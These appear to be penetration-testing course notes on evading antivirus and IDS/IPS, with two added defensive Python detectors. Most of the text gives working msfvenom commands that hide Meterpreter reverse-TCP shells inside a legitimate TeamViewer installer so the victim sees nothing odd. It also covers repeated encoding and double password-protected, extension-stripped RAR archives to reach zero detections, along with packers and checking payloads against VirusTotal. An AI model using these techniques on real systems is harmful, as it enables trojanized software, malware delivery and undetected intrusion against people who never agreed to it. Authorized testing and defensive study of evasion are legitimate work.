# Firewall & IDS/IPS Evasion

**Two Types of Protection to Understand**

**Endpoint Protection** — software on the device itself (Avast, Malwarebytes, BitDefender). Protects a single host. Includes AV, antimalware, firewall all in one package.

**Perimeter Protection** — physical/virtual devices at the network edge. Controls what enters/exits the network. Often sits between Internet → DMZ → Internal network.

***

**How Detection Works**

| Method                         | How it catches you                                                                                 |
| ------------------------------ | -------------------------------------------------------------------------------------------------- |
| **Signature-based**            | Matches your payload/traffic against known attack patterns. 100% match = alarm. Most common in AV. |
| **Heuristic/Anomaly**          | Compares behavior against a baseline. Anything unusual = alarm. Catches unknown threats.           |
| **Stateful Protocol Analysis** | Checks if traffic follows normal protocol behavior.                                                |
| **SOC/Live Monitoring**        | Humans watching live traffic dashboards. Hardest to evade.                                         |

***

**Evasion Techniques**

**1. Encoding (Limited effectiveness now)**

Basic encoding with `shikata_ga_nai` — the encoded payload is still detected by 11/59 AV engines. Modern AV uses heuristics, so encoding alone isn't enough anymore. It is still useful for removing bad characters.

**2. Backdoored Executables (Better)**

Embed payload inside a legitimate executable:

```bash
# -k keeps the original program running, -x sets the template executable,
# -e selects the encoder and -i the number of encoding iterations (5 here).
# Comments cannot follow a trailing backslash, so they live up here.
msfvenom -p windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 \
  -k \
  -x ~/Downloads/TeamViewer_Setup.exe \
  -e x86/shikata_ga_nai -i 5 \
  -a x86 --platform windows \
  -o ~/Desktop/TeamViewer_Setup.exe
```

The `-k` flag runs the payload in a separate thread so the real program still opens normally — less suspicious to the user.

> **Note on `-k`:** If the target runs it from the CLI, a separate window pops up briefly. From the GUI it's seamless.

**3. Password-Protected Archives (Very Effective)**

Wrapping payload in encrypted archive bypasses most AV signatures entirely because AV **can't scan inside encrypted archives**.

```bash
# Generate payload
msfvenom ... -o test.js

# Archive with password
rar a ~/test.rar -p ~/test.js    # password protect

# Remove extension (extra obfuscation)
mv test.rar test

# Archive again with password
rar a test2.rar -p test

# Remove extension again
mv test2.rar test2
```

Result: **0/49** detections on VirusTotal vs **11/59** raw.

Downside — AV dashboards flag it as "unable to scan" which alerts admins. Trade-off between evasion and stealth.

**4. Packers**

Compress + encrypt the entire executable structure. The packer decompresses at runtime transparently.

Popular packers: **UPX**, **Enigma Protector**, **Themida**, **MPRESS**

**5. Exploit Code Randomization**

For custom buffer overflow exploits — randomize offset values and avoid obvious NOP sleds (`\x90\x90\x90...`) since IDS signatures specifically look for these patterns:

```ruby
'Targets' => [
    [ 'Windows 2000 SP4', { 'Ret' => 0x77e14c29, 'Offset' => 5093 } ],
],
```
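As an added example (not from the original notes), here is the byte-run check that an IDS signature for a classic `\x90` sled amounts to, run over constructed buffers; `MIN_SLED` and the sample buffers are assumptions chosen for illustration.

```python
# Added example: the byte-run check behind a NOP-sled IDS signature,
# applied to constructed sample buffers (not real traffic).
from typing import List, Tuple

NOP = 0x90           # x86 single-byte NOP, the "\x90\x90\x90..." pattern
MIN_SLED = 16        # assumed threshold: runs at least this long are reported


def find_byte_runs(data: bytes, value: int, min_len: int) -> List[Tuple[int, int]]:
    """Return (offset, length) for every contiguous run of `value` >= min_len."""
    runs = []
    i, n = 0, len(data)
    while i < n:
        if data[i] != value:
            i += 1
            continue
        start = i
        while i < n and data[i] == value:
            i += 1
        if i - start >= min_len:
            runs.append((start, i - start))
    return runs


def nop_sled_alert(data: bytes, min_len: int = MIN_SLED) -> bool:
    """Signature-style verdict: does the buffer contain a contiguous NOP sled?"""
    return bool(find_byte_runs(data, NOP, min_len))


# Constructed samples: a 64-byte 0x90 sled surrounded by filler, and a buffer
# of the same shape whose middle region holds no repeated byte at all.
OBVIOUS_SLED = b"A" * 100 + b"\x90" * 64 + b"B" * 100
NO_RUN = b"A" * 100 + bytes((i * 7) % 251 for i in range(64)) + b"B" * 100

if __name__ == "__main__":
    print(find_byte_runs(OBVIOUS_SLED, NOP, MIN_SLED))           # [(100, 64)]
    print(nop_sled_alert(OBVIOUS_SLED), nop_sled_alert(NO_RUN))  # True False
```

The second buffer shows the limit of this signature: it only fires on an unbroken run of the same byte, which is why the text says to avoid obvious sleds and why behaviour-based detection is layered on top.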

***

**What MSF6 Does Automatically**

Meterpreter traffic is **AES encrypted** out of the box in MSF6. This handles most network-based IDS/IPS since they can't inspect encrypted traffic. Combined with Meterpreter running **in memory only**, forensic detection becomes very difficult.

***

**Checking Detection Rate**

```bash
msf-virustotal -k <API_key> -f test.js
```

Tests your payload against 50+ AV engines. Useful for gauging detection before deployment.

> **Important:** Never submit actual client engagement payloads to VirusTotal — it's a public service and submissions are shared with AV vendors, which would update their signatures.

***

**Key Takeaways**

* Raw msfvenom payloads will get caught by modern AV — always consider evasion
* Backdoored executables + encoding = better than encoding alone
* Password-protected archives = very effective but raises admin alerts
* Meterpreter AES encryption handles network-level detection automatically
* Deep evasion (custom packers, polymorphic code) is covered in later modules — this is just the intro

**Four Evasion Methods — Ranked by Effectiveness**

**Method 1 — Encoding (Weakest)**

```bash
# encode 5 times with shikata_ga_nai (a comment after a trailing backslash
# would break the line continuation, so it sits above the command)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 \
  -f exe > shell.exe
```

Result: Still detected by ~11/59 AV engines. Modern AV uses behavior analysis, not just signatures. Encoding alone is not enough but helps remove bad characters.

**Method 2 — Backdoored Executable (Better)**

```bash
# -x hides the payload inside a real program, -k keeps that program running too.
# The output path must differ from the template: redirecting onto
# TeamViewer_Setup.exe would truncate it before msfvenom reads it.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 \
  -x TeamViewer_Setup.exe \
  -k \
  -e x86/shikata_ga_nai -i 5 \
  -f exe -o ~/Desktop/TeamViewer_Setup.exe
```

Payload is buried inside legitimate code. Much harder to detect. The `-k` flag means when victim runs it, **TeamViewer actually opens** — nothing looks suspicious.

**Method 3 — Password Protected Archive (Very Effective)**

```bash
# Wrap payload in encrypted RAR twice, remove extension
rar a test.rar -p test.js     # password protect
mv test.rar test               # remove extension
rar a test2.rar -p test        # archive again
mv test2.rar test2             # remove extension again
```

Result: **0/49** AV detections.

Why it works: AV **cannot scan inside encrypted archives** — it literally can't see the payload.

Downside: AV logs show "unable to scan this file" which alerts admins. So you're invisible to AV but possibly visible to a human analyst.
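Here is an added defender-side example, not part of the original notes, covering this method and the password-protected-archive section earlier on the page: it identifies archives by magic bytes regardless of the file name (catching the stripped extension) and flags ZIP entries whose header marks them as password-protected, the condition that makes AV report "unable to scan". RAR is recognised by magic only; the constructed ZIP sample sets the encryption flag on a harmless entry.

```python
# Added example: gateway-style triage for renamed and password-protected archives.
# Detection logic and samples are constructed for illustration, not from the notes.
import io
import os
import zipfile
from typing import List, Optional

RAR4_MAGIC = b"Rar!\x1a\x07\x00"
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"
ZIP_MAGIC = b"PK\x03\x04"
ARCHIVE_EXTS = {".rar", ".zip"}


def sniff_archive(data: bytes) -> Optional[str]:
    """Identify an archive by magic bytes, ignoring whatever the file is named."""
    if data.startswith(RAR5_MAGIC):
        return "rar5"
    if data.startswith(RAR4_MAGIC):
        return "rar4"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    return None

def zip_has_encrypted_entries(data: bytes) -> bool:
    """General-purpose bit 0 in an entry's header marks it as password-protected."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return any(info.flag_bits & 0x1 for info in zf.infolist())

def triage(filename: str, data: bytes) -> List[str]:
    """Return the reasons a mail/web gateway should hold this file for review."""
    findings = []
    kind = sniff_archive(data)
    if kind is None:
        return findings
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ARCHIVE_EXTS:   # e.g. "test" or "test2" with no extension
        findings.append(f"{kind} archive with extension {ext!r} (renamed archive)")
    if kind == "zip" and zip_has_encrypted_entries(data):
        findings.append("zip entries are password-protected (contents not scannable)")
    return findings

def make_encrypted_zip_sample() -> bytes:
    """Constructed sample: a harmless zip with the encryption flag set on its entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("test.js", "// constructed sample text, not a payload")
    data = bytearray(buf.getvalue())
    for sig, flag_off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        data[data.find(sig) + flag_off] |= 0x01   # local + central header flags
    return bytes(data)
```

Both tricks described above trip this check: `triage("test2", make_encrypted_zip_sample())` yields two findings, while a plain `.txt` yields none.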

**Method 4 — Packers (Advanced)**

Tools like UPX and Themida compress + encrypt the entire executable. The payload decompresses at runtime. Adds another layer on top of everything else. Not something you manually do in CPTS, but know it exists.
